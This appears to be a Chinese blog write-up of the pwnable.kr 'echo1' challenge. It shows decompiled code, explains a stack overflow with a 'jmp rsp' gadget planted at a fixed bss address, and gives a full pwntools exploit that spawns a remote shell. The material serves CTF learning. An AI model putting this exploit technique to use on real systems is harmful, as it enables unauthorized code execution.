pwnable.kr echo1

好久没做pwn的练习,菜还不多练习,简直要说不过去。这段时间争取多做几道pwn题吧~

确定思路

拿到题目先看一下是多少位的,然后再看看开了什么保护。发现是64位的程序,保护嘛——都没开。。。这下就相对好做多了。

enter image description here

然后去ida里面看看程序的逻辑。原本想法是v7处有24字节的输入,目前最短的shellcode有23字节,刚刚好。在echo1这个函数处也有输入,距离rbp只有0x20,但是可以接收128字节,我们可以控制rip,然后跳到shellcode上执行,但是没有办法知道shellcode的位置,所以这个思路就行不通了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
int __cdecl main(int argc, const char **argv, const char **envp)
{
unsigned int *v3; // rsi
_QWORD *v4; // rax
unsigned int v6; // [rsp+Ch] [rbp-24h]
__int64 v7; // [rsp+10h] [rbp-20h]
__int64 v8; // [rsp+18h] [rbp-18h]
__int64 v9; // [rsp+20h] [rbp-10h]

setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
o = malloc(0x28uLL);
*((_QWORD *)o + 3) = greetings;
*((_QWORD *)o + 4) = byebye;
printf("hey, what's your name? : ", 0LL);
v3 = (unsigned int *)&v7;
__isoc99_scanf("%24s", &v7);
v4 = o;
*(_QWORD *)o = v7;
v4[1] = v8;
v4[2] = v9;
id = v7;
getchar();
func[0] = (__int64)echo1;
qword_602088 = (__int64)echo2;
qword_602090 = (__int64)echo3;
v6 = 0;
do
{
while ( 1 )
{
while ( 1 )
{
puts("\n- select echo type -");
puts("- 1. : BOF echo");
puts("- 2. : FSB echo");
puts("- 3. : UAF echo");
puts("- 4. : exit");
printf("> ", v3);
v3 = &v6;
__isoc99_scanf("%d", &v6);
getchar();
if ( v6 > 3 )
break;
((void (__fastcall *)(const char *, unsigned int *))func[v6 - 1])("%d", &v6);
}
if ( v6 == 4 )
break;
puts("invalid menu");
}
cleanup("%d", &v6);
printf("Are you sure you want to exit? (y/n)");
v6 = getchar();
}
while ( v6 != 121 );
puts("bye");
return 0;
}
1
2
3
4
5
6
7
8
9
10
__int64 echo1()
{
char s; // [rsp+0h] [rbp-20h]

(*((void (__fastcall **)(void *))o + 3))(o);
get_input(&s, 128LL);
puts(&s);
(*((void (__fastcall **)(void *))o + 4))(o);
return 0LL;
}

古老的jmp esp

很早前,32位的年代,没有aslr的时候,jmp esp非常好用。但现在的程序aslr+canary+nx是标配了,得考虑其它手段。但现在这个程序什么保护都没开,于是新的思路出现了。由于没有开nx,我们可以把shellcode放在栈区,payload类似这样:padding + jmp rsp + shellcode。目前还有一个问题:jmp rsp放在哪里?于是再次看看前面有什么落下的没。v7是我们第一次的输入,id的值是由v7来决定,所以我们可以控制id的内容,id又是在bss段,所以这个地址不会变。

printf(“hey, what’s your name? : “, 0LL);
v3 = (unsigned int *)&v7;
__isoc99_scanf(“%24s”, &v7);
v4 = o;
*(_QWORD *)o = v7;
v4[1] = v8;
v4[2] = v9;
id = v7;

Exploit

id的地址是0x6020A0,又pattern生成测试的padding,得知我们需要填充的padding为40个字节。所以我们构造如下的exp。

enter image description here

enter image description here

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

from pwn import *

target = remote('pwnable.kr',9010)
context(os = 'linux',arch = 'amd64')
target.recvuntil('name? : ')
jmp2rsp = asm('jmp rsp')
addr_id = 0x6020A0
target.sendline(jmp2rsp + '\x00\x00')
target.recvuntil('>')
target.sendline('1')
shellcode = asm(shellcraft.sh())
payload = 'x' * 40 + p64(addr_id) + shellcode
target.sendline(payload)
target.interactive()

enter image description here

文章作者: Carl Star
文章链接: http://carlstar.club/2018/05/31/pwnable-kr-echo1/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hexo